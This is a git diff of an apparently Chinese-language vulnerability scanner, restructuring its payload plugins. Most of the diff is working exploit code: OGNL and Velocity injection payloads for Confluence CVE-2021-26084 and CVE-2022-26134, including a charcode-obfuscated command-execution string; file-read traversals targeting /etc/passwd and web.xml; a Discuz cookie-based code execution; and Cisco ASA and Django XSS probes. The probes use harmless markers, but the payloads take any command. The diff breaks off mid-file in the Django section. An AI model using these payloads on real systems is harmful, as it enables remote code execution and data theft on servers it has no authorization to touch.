%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/?search={RCECOMMAND}'} + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'AtlassianConfluence', + 'vul_type': 'RCE', + 'vul_id': 'CVE-2022-26134', + } + + headers = { + 'Referer': client.protocol_domain + } + + for payload in self.payloads: + random_str = random_md5(6) + RCEcommand = 'echo%20' + random_str + + path = payload['path'].format(RCECOMMAND=RCEcommand) + + res = client.request( + 'get', + path, + headers=headers, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + x_cmd_response = res.headers.get('X-Cmd-Response', '') + x_confluence = base64.b64decode(res.headers.get('X-Confluence', '')).decode() + + if (check.check_res(x_cmd_response, random_str)): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + elif (check.check_res(x_confluence, random_str)): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Response-Headers': 'X-Confluence: XXX', + 'Response-Decode': 'Base64', + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/AtlassianConfluence/cve_2015_8399.py b/payloads/AtlassianConfluence/cve_2015_8399.py deleted file mode 100644 index d5599c5..0000000 --- a/payloads/AtlassianConfluence/cve_2015_8399.py +++ /dev/null @@ -1,63 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool import check - -cve_2015_8399_payloads = [ - {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///etc/passwd'}, - {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'}, - {'path': 'admin/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'}, - {'path': 'admin/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'}, - {'path': 'viewdefaultdecorator.action?decoratorName=file:///etc/passwd'}, - {'path': 'viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'}, - {'path': 'viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'}, - {'path': 'viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'}, - {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd'}, - {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts'}, - {'path': 'spaces/viewdefaultdecorator.action?decoratorName=file:///C:/Windows/System32/drivers/etc/hosts'}, - {'path': 'spaces/viewdefaultdecorator.action?decoratorName=/WEB-INF/web.xml'}, -] - -def cve_2015_8399_scan(clients): - ''' Atlassian Confluence 5.8.17之前版本中存在安全, - 该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件 - 没有充分过滤'decoratorName'参数, - 远程攻击者可利用该漏洞读取配置文件 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'AtlassianConfluence', - 'vul_type': 'FileRead', - 'vul_id': 'CVE-2015-8399', - } - - headers = { - 'Referer': client.protocol_domain, - 'Origin': client.protocol_domain, - } - - for payload in cve_2015_8399_payloads: - path = payload['path'] - - res = client.request( - 'get', - path, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - if (check.check_res_fileread(res.text) # * /etc/passwd or hosts - or (('' in res.text) # * web.xml - and ('Confluence' in res.text)) - ): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/AtlassianConfluence/cve_2019_3396.py b/payloads/AtlassianConfluence/cve_2019_3396.py deleted file mode 100644 index 697395a..0000000 --- a/payloads/AtlassianConfluence/cve_2019_3396.py +++ /dev/null @@ -1,73 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool import check - -cve_2019_3396_payloads = [ - # { # * 用于命令执行, 需要将payload保存至.vm文件中, 然后加载远程文件 - # 'path': 'rest/tinymce/1/macro/preview', - # 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.example.com/v/123456", "width": "1000"," height": "1000","_template":"https://www.example.com/confluence.vm","command":' + cmd + '}}}', - # 'headers': {'Content-Type': 'application/json; charset=utf-8'} - # }, - { - 'path': 'rest/tinymce/1/macro/preview', - 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///etc/passwd"}}}', - }, - { - 'path': 'rest/tinymce/1/macro/preview', - 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:\Windows\System32\drivers\etc\hosts"}}}', - }, - { - 'path': 'rest/tinymce/1/macro/preview', - 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:/Windows/System32/drivers/etc/hosts"}}}', - }, - { - 'path': 'rest/tinymce/1/macro/preview', - 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"../web.xml"}}}', - } -] - -def cve_2019_3396_scan(clients): - ''' Atlassian Confluence 6.14.2 版本之前存在未经授权的目录遍历漏洞, - 攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'AtlassianConfluence', - # 'vul_type' = 'FileRead/RCE', - 'vul_type': 'FileRead', - 'vul_id': 'CVE-2019-3396', - } - - headers = { - 'Content-Type': 'application/json; charset=utf-8', - 'Referer': client.protocol_domain - } - - for payload in cve_2019_3396_payloads: - path = payload['path'] - data = payload['data'] - - res = client.request( - 'post', - path, - data=data, - headers=headers, - vul_info=vul_info - ) - if res is None: - continue - - # (check.check_res(res.text, self.md)) - if (check.check_res_fileread(res.text) - or (('' in res.text) - and ('Confluence' in res.text)) - ): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/AtlassianConfluence/cve_2021_26084.py b/payloads/AtlassianConfluence/cve_2021_26084.py deleted file mode 100644 index c585e90..0000000 --- a/payloads/AtlassianConfluence/cve_2021_26084.py +++ /dev/null @@ -1,61 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool.md5 import random_int_2 -from lib.tool import check - -random_num_1, random_num_2 = random_int_2() - -cve_2021_26084_payloads = [ - { - 'path': 'pages/doenterpagevariables.action', - 'data': 'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat%20/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027', - }, - { - 'path': 'pages/doenterpagevariables.action', - 'data': 'queryString=%5cu0027%2b%7b{NUM1}*{NUM2}%7d%2b%5cu0027'.format(NUM1=random_num_1, NUM2=random_num_2), - } -] - -def cve_2021_26084_scan(clients): - ''' Confluence存在一个OGNL注入漏洞, - 允许未经身份验证的攻击者在Confluence服务器或数据中心实例上执行任意代码 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'AtlassianConfluence', - 'vul_type': 'RCE', - 'vul_id': 'CVE-2021-26084', - } - - headers = { - 'Referer': client.protocol_domain - } - - for payload in cve_2021_26084_payloads: - path = payload['path'] - data = payload['data'] - - res = client.request( - 'post', - path, - data=data, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - random_num_sum = random_num_1 * random_num_2 - if (check.check_res_fileread(res.text) - or (str(random_num_sum) in res.text) - ): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/AtlassianConfluence/cve_2022_26134.py b/payloads/AtlassianConfluence/cve_2022_26134.py deleted file mode 100644 index 673b057..0000000 --- a/payloads/AtlassianConfluence/cve_2022_26134.py +++ /dev/null @@ -1,64 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool.md5 import random_md5 -from lib.tool import check -import base64 - -cve_2022_26134_payloads = [ - {'path': '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22{RCECOMMAND}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'}, - {'path': '%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Confluence%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C114%2C101%2C113%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C99%2C111%2C109%2C46%2C111%2C112%2C101%2C110%2C115%2C121%2C109%2C112%2C104%2C111%2C110%2C121%2C46%2C119%2C101%2C98%2C119%2C111%2C114%2C107%2C46%2C83%2C101%2C114%2C118%2C108%2C101%2C116%2C65%2C99%2C116%2C105%2C111%2C110%2C67%2C111%2C110%2C116%2C101%2C120%2C116%2C46%2C103%2C101%2C116%2C82%2C101%2C113%2C117%2C101%2C115%2C116%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C99%2C109%2C100%2C61%2C114%2C101%2C113%2C46%2C103%2C101%2C116%2C80%2C97%2C114%2C97%2C109%2C101%2C116%2C101%2C114%2C40%2C34%2C115%2C101%2C97%2C114%2C99%2C104%2C34%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C59%2C13%2C10%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C110%2C101%2C119%2C32%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C83%2C99%2C97%2C110%2C110%2C101%2C114%2C40%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C101%2C120%2C101%2C99%2C40%2C99%2C109%2C100%2C41%2C46%2C103%2C101%2C116%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C41%2C46%2C117%2C115%2C101%2C68%2C101%2C108%2C105%2C109%2C105%2C116%2C101%2C114%2C40%2C34%2C92%2C92%2C65%2C34%2C41%2C46%2C110%2C101%2C120%2C116%2C40%2C41%2C46%2C103%2C101%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/?search={RCECOMMAND}'} -] - -def cve_2022_26134_scan(clients): - ''' 2022年6月2日Atlassian官方发布了一则安全更新, 通告了一个严重且已在野利用的代码执行漏洞, - 攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'AtlassianConfluence', - 'vul_type': 'RCE', - 'vul_id': 'CVE-2022-26134', - } - - headers = { - 'Referer': client.protocol_domain - } - - for payload in cve_2022_26134_payloads: - random_str = random_md5(6) - RCEcommand = 'echo%20' + random_str - - path = payload['path'].format(RCECOMMAND=RCEcommand) - - res = client.request( - 'get', - path, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - x_cmd_response = res.headers.get('X-Cmd-Response', '') - x_confluence = base64.b64decode(res.headers.get('X-Confluence', '')).decode() - - if (check.check_res(x_cmd_response, random_str)): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - elif (check.check_res(x_confluence, random_str)): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Response-Headers': 'X-Confluence: XXX', - 'Response-Decode': 'Base64', - 'Request': res - } - return results - return None diff --git a/payloads/AtlassianConfluence/main.py b/payloads/AtlassianConfluence/main.py deleted file mode 100644 index dce580f..0000000 --- a/payloads/AtlassianConfluence/main.py +++ /dev/null @@ -1,50 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - Atlassian Confluence扫描类: - 1. Confluence路径遍历和命令执行 - CVE-2019-3396 - Payload: https://vulhub.org/#/environments/confluence/CVE-2019-3396/ - - 2. Confluence Server Webwork Pre-Auth OGNL表达式命令注入 - CVE-2021-26084 - Payload: https://vulhub.org/#/environments/confluence/CVE-2021-26084/ - - 3. Confluence任意文件包含 - CVE-2015-8399 - Payload: https://blog.csdn.net/caiqiiqi/article/details/106004003 - - 4. Confluence远程代码执行 - CVE-2022-26134 - Payload-1: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134 - Payload-2: https://github.com/SNCKER/CVE-2022-26134 - -file:///etc/passwd -file:///C:\Windows\System32\drivers\etc\hosts -file:///C:/Windows/System32/drivers/etc/hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.AtlassianConfluence.cve_2015_8399 import cve_2015_8399_scan -from payloads.AtlassianConfluence.cve_2019_3396 import cve_2019_3396_scan -from payloads.AtlassianConfluence.cve_2021_26084 import cve_2021_26084_scan -from payloads.AtlassianConfluence.cve_2022_26134 import cve_2022_26134_scan - -class AtlassianConfluence(): - def __init__(self): - self.app_name = 'AtlassianConfluence' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2015_8399_scan, clients=clients), - thread(target=cve_2019_3396_scan, clients=clients), - thread(target=cve_2021_26084_scan, clients=clients), - thread(target=cve_2022_26134_scan, clients=clients) - ] - -confluence = AtlassianConfluence() diff --git a/payloads/Cisco/cisco-cve-2020-3580-xss.py b/payloads/Cisco/cisco-cve-2020-3580-xss.py new file mode 100644 index 0000000..6f98ba8 --- /dev/null +++ b/payloads/Cisco/cisco-cve-2020-3580-xss.py @@ -0,0 +1,73 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Cisco ASA设备/FTD设备 XSS跨站脚本攻击 + CVE-2020-3580 + +Cisco ASA设备/FTD设备 XSS跨站脚本攻击 (反射型) +''' + +from lib.tool.md5 import random_md5 +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + { + 'path': '+CSCOE+/saml/sp/acs?tgname=a', + 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' + }, + { + 'path': 'saml/sp/acs?tgname=a', + 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' + }, + { + 'path': 'sp/acs?tgname=a', + 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' + }, + { + 'path': 'acs?tgname=a', + 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' + } + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'Cisco', + 'vul_type': 'XSS', + 'vul_id': 'CVE-2020-3580', + } + + for payload in self.payloads: # * Payload + random_str = random_md5(8) + + path = payload['path'] # * Path + data = payload['data'].format(TEXT=random_str) # * Data + + res = client.request( + 'post', + path, + data=data, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + if (("onload=confirm('" + random_str + "')") in res.text): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/Cisco/cve_2020_3580.py b/payloads/Cisco/cve_2020_3580.py deleted file mode 100644 index b25af64..0000000 --- a/payloads/Cisco/cve_2020_3580.py +++ /dev/null @@ -1,61 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool.md5 import random_md5 -# from lib.tool import check - -cve_2020_3580_payloads = [ - { - 'path': '+CSCOE+/saml/sp/acs?tgname=a', - 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' - }, - { - 'path': 'saml/sp/acs?tgname=a', - 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' - }, - { - 'path': 'sp/acs?tgname=a', - 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' - }, - { - 'path': 'acs?tgname=a', - 'data': 'SAMLResponse=%22%3e%3csvg%2fonload%3dconfirm(\'{TEXT}\')%3e' - } -] - -def cve_2020_3580_scan(clients): - ''' Cisco ASA设备/FTD设备 XSS跨站脚本攻击 - 反射型 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'Cisco', - 'vul_type': 'XSS', - 'vul_id': 'CVE-2020-3580', - } - - for payload in cve_2020_3580_payloads: # * Payload - random_str = random_md5(8) - - path = payload['path'] # * Path - data = payload['data'].format(TEXT=random_str) # * Data - - res = client.request( - 'post', - path, - data=data, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - if (("onload=confirm('" + random_str + "')") in res.text): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/Cisco/main.py b/payloads/Cisco/main.py deleted file mode 100644 index 4bc7383..0000000 --- a/payloads/Cisco/main.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - Cisco相关设备/页面扫描类: - Cisco ASA设备/FTD设备 XSS跨站脚本攻击 - CVE-2020-3580 -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.Cisco.cve_2020_3580 import cve_2020_3580_scan - -class Cisco(): - def __init__(self): - self.app_name = 'Cisco' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2020_3580_scan, clients=clients) - ] - -cisco = Cisco() \ No newline at end of file diff --git a/payloads/Discuz/discuz-wooyun-2010-080723-rce.py b/payloads/Discuz/discuz-wooyun-2010-080723-rce.py new file mode 100644 index 0000000..b066428 --- /dev/null +++ b/payloads/Discuz/discuz-wooyun-2010-080723-rce.py @@ -0,0 +1,76 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Discuz!论坛(BBS)是一个采用PHP和MySQL等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台: https://discuz.dismall.com + Discuz 全局变量防御绕过导致代码执行 + wooyun-2010-080723 + Payload: https://vulhub.org/#/environments/discuz/wooyun-2010-080723/ + +由于php5.3.x版本里php.ini的设置里request_order默认值为GP, + 导致$_REQUEST中不再包含$_COOKIE, + 我们通过在Cookie中传入$GLOBALS来覆盖全局变量, 可以造成代码执行漏洞。 +''' + +from lib.tool.md5 import random_int_1 +from lib.tool import check +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + { + 'path': 'viewthread.php?tid=10&extra=page%3D1', + 'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'} + }, + { + 'path': '?tid=10&extra=page%3D1', + 'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'} + }, + { + 'path': '', + 'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'} + }, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'Discuz', + 'vul_type': 'RCE', + 'vul_id': 'wooyun-2010-080723', + } + + for payload in self.payloads: + random_str = str(random_int_1(6)) + RCEcommand = 'print_r(' + random_str + ')' + + path = payload['path'] + headers = payload['headers'] + headers['Cookie'] = headers['Cookie'].format(RCECOMMAND=RCEcommand) + + res = client.request( + 'get', + path, + headers=headers, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + if (check.check_res(res.text, random_str, 'print_r')): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/Discuz/main.py b/payloads/Discuz/main.py deleted file mode 100644 index 51ea23f..0000000 --- a/payloads/Discuz/main.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' -Discuz!论坛(BBS)是一个采用PHP和MySQL等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台: https://discuz.dismall.com - Discuz扫描类: - 1. Discuz 全局变量防御绕过导致代码执行 - wooyun-2010-080723 - Payload: https://vulhub.org/#/environments/discuz/wooyun-2010-080723/ - -file:///etc/passwd -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.Discuz.wooyun_2010_080723 import wooyun_2010_080723_scan - -class Discuz(): - def __init__(self): - self.app_name = 'Discuz' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=wooyun_2010_080723_scan, clients=clients) - ] - -discuz = Discuz() diff --git a/payloads/Discuz/wooyun_2010_080723.py b/payloads/Discuz/wooyun_2010_080723.py deleted file mode 100644 index 7317f15..0000000 --- a/payloads/Discuz/wooyun_2010_080723.py +++ /dev/null @@ -1,61 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool.md5 import random_int_1 -from lib.tool import check - -wooyun_2010_080723_payloads = [ - { - 'path': 'viewthread.php?tid=10&extra=page%3D1', - 'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'} - }, - { - 'path': '?tid=10&extra=page%3D1', - 'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'} - }, - { - 'path': '', - 'headers': {'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]={RCECOMMAND};'} - }, -] - -def wooyun_2010_080723_scan(clients): - ''' - 由于php5.3.x版本里php.ini的设置里request_order默认值为GP, - 导致$_REQUEST中不再包含$_COOKIE, - 我们通过在Cookie中传入$GLOBALS来覆盖全局变量, 可以造成代码执行漏洞。 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'Discuz', - 'vul_type': 'RCE', - 'vul_id': 'wooyun-2010-080723', - } - - for payload in wooyun_2010_080723_payloads: - random_str = str(random_int_1(6)) - RCEcommand = 'print_r(' + random_str + ')' - - path = payload['path'] - headers = payload['headers'] - headers['Cookie'] = headers['Cookie'].format(RCECOMMAND=RCEcommand) - - res = client.request( - 'get', - path, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - if (check.check_res(res.text, random_str, 'print_r')): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/Django/cve_2017_12794.py b/payloads/Django/cve_2017_12794.py deleted file mode 100644 index a5b6eef..0000000 --- a/payloads/Django/cve_2017_12794.py +++ /dev/null @@ -1,65 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool.md5 import random_md5 -# from lib.tool import check - -cve_2017_12794_payloads = [ - {'path': '{URLCONF}/?username='}, - # {'path': 'create_user/?username='}, - # {'path': '?username='}, -] - -def cve_2017_12794_scan(self, clients): - '''Django debug page XSS漏洞 - 构造url创建新用户, 同时拼接xss语句, 得到已创建的提示; - 此时再次访问该链接(即创建同一个xss用户), 将触发恶意代码 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': self.app_name, - 'vul_type': 'XSS', - 'vul_id': 'CVE-2017-12794', - } - - urlConfList = self.get_urlconf(client, vul_info) # * 获取Django定义的URL路径 - if not urlConfList: - return None - - for payload in cve_2017_12794_payloads: # * Payload - for urlConf in urlConfList: - random_str = random_md5(5) # * 随机5位字符串 - - path = payload['path'].format(URLCONF=urlConf, TEXT=random_str) # * Path - - res1 = client.request( - 'get', - path, - vul_info=vul_info - ) - if res1 is None: - continue - - # * 该XSS漏洞的特性, 需要请求2次, 2次的payload必须一模一样 - res2 = client.request( - 'get', - path, - vul_info=vul_info - ) - if res2 is None: - continue - - text_1 = "'}, + # {'path': 'create_user/?username='}, + # {'path': '?username='}, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'Django', + 'vul_type': 'XSS', + 'vul_id': 'CVE-2017-12794', + } + + urlConfList = get_urlconf(client, vul_info) # * 获取Django定义的URL路径 + if not urlConfList: + return None + + for payload in self.payloads: # * Payload + for urlConf in urlConfList: + random_str = random_md5(5) # * 随机5位字符串 + + path = payload['path'].format(URLCONF=urlConf, TEXT=random_str) # * Path + + res1 = client.request( + 'get', + path, + vul_info=vul_info + ) + if res1 is None: + continue + + # * 该XSS漏洞的特性, 需要请求2次, 2次的payload必须一模一样 + res2 = client.request( + 'get', + path, + vul_info=vul_info + ) + if res2 is None: + continue + + text_1 = "